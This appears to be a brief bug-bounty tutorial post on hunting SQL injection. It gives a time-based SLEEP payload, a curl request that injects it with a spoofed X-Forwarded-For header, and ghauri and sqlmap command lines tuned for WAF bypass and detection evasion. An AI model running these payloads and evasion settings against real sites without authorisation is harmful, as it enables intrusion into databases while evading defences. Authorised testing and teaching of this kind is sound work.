A Simple Yet Effective Way to Find SQLI Vulnerabilities

Prapattimynk · Feb 25, 2025

Sometimes, simple methods work best when hunting for SQL injection (SQLI) vulnerabilities. Here’s an optimized approach:

1. Extract Potential Targets

Use Wayback Machine URLs to find historical URLs with parameters:

waybackurls --dates target.com | grep '?id='

This helps identify pages that may still be vulnerable.

2. Test for SQLI Sleep-Based Vulnerabilities

Use the following payload:

if(now()=sysdate(),SLEEP(8),0)

If the response is delayed by ~8 seconds, the parameter is likely injectable.

3. Manual Testing with cURL

curl -X GET "https://target.com/page.php?id=1" --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -" -H "X-Forwarded-For: 127.0.0.1"

•The X-Forwarded-For header may help bypass basic IP-based WAF restrictions.

•Modify headers like User-Agent to mimic real traffic.

4. Automated Testing with Ghauri (Bypassing WAFs)

ghauri -u "https://target.com/page.php?id=1" --timeout=30 --delay=5 --technique=BEST --level=3 --prefix="/**/" --suffix="-- -" --safe-chars="[]" --random-agent --ignore-code=403

--timeout=30: Sets the request timeout to 30 seconds.

--delay=5: Adds a 5-second delay between requests to avoid detection.

--technique=BEST: Uses the most effective SQL injection techniques.

--level=3: Performs more advanced tests for better detection.

--prefix="/**/": Adds a comment prefix to bypass WAF filters.

--suffix="-- -": Ends the payload with a SQL comment to evade detection.

--safe-chars="[]": Prevents certain characters from being URL-encoded.

--random-agent: Uses a random User-Agent to avoid fingerprinting.

--ignore-code=403: Ignores 403 Forbidden responses to continue scanning.

5. Advanced Testing with SQLMap

sqlmap -u "https://target.com/page.php?id=1" --batch --random-agent --tamper="between,space2comment,charencode" --timeout=15 --time-sec=8 --level=5 --risk=3

--random-agent: Uses random user-agents to avoid detection.

--tamper: Applies obfuscation techniques to evade WAFs.

--risk=3 --level=5: Enables deep scanning with advanced payloads.

Conclusion

Wayback Machine helps find old endpoints.

Manual payloads help confirm basic SQL injection.

Ghauri & SQLMap provide automation with WAF bypass techniques.

#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas

A Simple Yet Effective Way to Find SQLI Vulnerabilities

1. Extract Potential Targets​

2. Test for SQLI Sleep-Based Vulnerabilities​

3. Manual Testing with cURL​

4. Automated Testing with Ghauri (Bypassing WAFs)​

5. Advanced Testing with SQLMap​

Conclusion​